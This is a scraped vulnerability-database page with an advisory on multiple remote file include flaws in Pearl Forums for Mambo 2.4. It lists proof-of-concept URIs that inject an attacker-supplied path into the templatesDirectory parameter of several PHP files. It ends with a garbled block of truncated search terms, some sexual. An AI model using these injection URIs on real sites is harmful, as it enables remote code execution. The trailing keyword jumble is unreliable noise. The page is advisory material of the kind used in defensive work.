exploits , vulnerabilities , articles , Pearl Forums for Mambo Multiple Remote File Include Vulnerabilities

Title	Pearl Forums for Mambo Multiple Remote File Include Vulnerabilities
Published	2006-11-22-12:00AM
Updated	2006-11-24-08:25PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Dr Max Virus is credited with the discovery of these vulnerabilities.
Vulnerable	Pearl Forums Pearl For Mambo 2.4
Not Vulnerable
Code	An attacker may exploit these issues using a web client. The following proof-of-concept URIs are available: http://www.example.com/[path]/includes/admin.php?templatesDirectory-evill code http://www.example.com//[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill code http://www.example.com//[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill code http://www.example.com//[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill code http://www.example.com//[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill code http://www.example.com//[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill code
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability
2009-12-17 Digital Scribe Cross Site Scripting and SQL Injection Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 19:04:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
xemphimsec gogle www.sexima maxcpm.inf iPlanet Ad sex women /modernbil news for c mambo Remo 18 sex fre php-nuke 2 I agree wi homes 200 /compo guest book huhuyui sexy walpe php shell www.700xxx Wap sixy c ap .../_te www.Sexgir 5_H_1_3_C_ proFTPD 1. ZTOD.COM Sania nued bollywood tirisha se www.qggler www.hpv39. news for c kitchen si News Searc Invision p Indianxxx. arab tgirl hot y neck www.hpv39. CMS is Fre smspass naked wome www.aah5.c tirisha se Pimp my mx pinkygirlp 81237 Ringtouns swan frontend/x ept9.com